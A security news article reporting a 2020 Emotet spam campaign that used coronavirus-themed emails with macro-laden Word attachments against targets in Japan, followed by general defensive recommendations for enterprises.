Emotet Uses Coronavirus Scare in Latest Campaign, Targets Japan
January 31, 2020
Threat actors behind the Emotet malware used the novel coronavirus (2019-nCoV) scare as a hook for their spam email campaign against targets in Japan.
2019-nCoV, which is believed to have originated in Wuhan, China, in the past month, has caused hundreds of deaths and thousands of confirmed cases in China alone. The virus has already spread to neighboring countries and confirmed cases have been reported in farther places such as Germany, Canada, and the U.S., causing the World Health Organization to declare a global health emergency. The official advisory of the Japanese Ministry of Health, Labour and Welfare on the outbreak can be found here (in Japanese).
IBM X-Force reported that the coronavirus spam emails were disguised as official notifications sent by a disability welfare provider and public health centers. The email content warns recipients about the rapid spread of the virus, and instructs them to download an attached notice that allegedly contains preventive measures.
As in several previous campaigns, the coronavirus spam emails had Word document attachments. The text in the document contained instructions to click on the Enable Content button to be able to view the document. Clicking on the button installs the Emotet payload using a PowerShell command.
The spam emails include a footer with legitimate details such as mailing address and contact numbers in an attempt to appear legitimate.
The campaign follows in the footsteps of previous Emotet spam email campaigns, which took advantage of well-known personalities and occasions such as Christmas to blast the emails.
Devices infected with Emotet malware can deploy ransomware. The malware can also drop other types of malware that steal user credentials, browser history, and sensitive documents. The harvested data can then be used to send spam to other email accounts.
Emotet was discovered by Trend Micro as TrojanSpy.Win32.EMOTET.THIBEAI in 2014. Back then, it was known as a banking malware variant that stole data by sniffing out network activity. Over the years, the malware had evolved in many ways; versions of Emotet have since been found acting as a loader for other malware families and adding a new evasion technique.
Defense against Emotet
The Emotet malware persists as a threat as cybercriminals continue to increase not just the level of harm it brings, but also the sophistication of the social engineering techniques used to propagate it via email. Below are the recommendations for protecting the enterprise’s systems against Emotet:
- Carefully inspect emails, especially those that include links or attachments. If they appear to come from a reputable institution, verify the contact information by checking details listed on its official website.
- Provide security awareness training to employees to teach them how to avoid email threats.
- Deploy the latest patches and updates for operating systems and applications.
- Ensure that antispam filters are properly configured.
- Adhere to the principle of least privilege.
Enterprises can thwart malware such as Emotet by adopting a multilayered security approach to protect all fronts (gateways, endpoints, networks, and servers).
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.
Posted in Cybercrime & Digital Threats, botnets, malware